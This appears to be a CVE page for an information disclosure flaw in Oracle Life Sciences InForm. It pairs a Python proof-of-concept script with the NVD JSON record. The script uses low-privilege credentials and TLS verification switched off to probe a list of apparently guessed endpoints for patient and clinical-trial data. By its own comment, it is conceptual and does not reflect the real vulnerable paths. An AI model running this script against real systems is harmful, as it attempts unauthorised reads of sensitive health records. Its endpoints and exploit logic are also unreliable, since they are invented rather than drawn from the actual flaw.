CVE-2025-61885

# CVE-2025-61885 - Oracle Life Sciences InForm Information Disclosure PoC # Vulnerability: Unauthorized read access via Web Server component # Affected: Oracle Life Sciences InForm 7.0.1.0 import requests from requests.auth import HTTPBasicAuth TARGET_URL = "https://target-oracle-inform.example.com" USERNAME = "low_privilege_user" PASSWORD = "user_password" # Step 1: Authenticate with low-privilege credentials session = requests.Session() login_url = f"{TARGET_URL}/inform/login" # Step 2: Send authenticated request to access restricted data # The vulnerability allows reading data subsets that should be restricted exploit_endpoints = [ "/inform/api/v1/patients", "/inform/api/v1/studies", "/inform/api/v1/subjects", "/inform/api/v1/clinicaldata", "/inform/restricted/data" ] for endpoint in exploit_endpoints: try: response = session.get( f"{TARGET_URL}{endpoint}", auth=HTTPBasicAuth(USERNAME, PASSWORD), verify=False, timeout=10 ) if response.status_code == 200 and "restricted" in response.text.lower(): print(f"[+] Potential data leak at: {endpoint}") print(f"[+] Response snippet: {response.text[:500]}") except Exception as e: print(f"[-] Error accessing {endpoint}: {e}") # Note: This is a conceptual PoC. Actual exploitation paths # depend on the specific vulnerable endpoints in the affected version.

{"cve": {"id": "CVE-2025-61885", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:53.523", "lastModified": "2025-10-24T13:20:00.583", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Life Sciences InForm product of Oracle Health Sciences Applications (component: Web Server). The supported version that is affected is 7.0.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Life Sciences InForm. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Life Sciences InForm accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:life_sciences_inform:7.0.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "6A1A0C83-890A-4761-93FB-4CBC1A06D14D"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}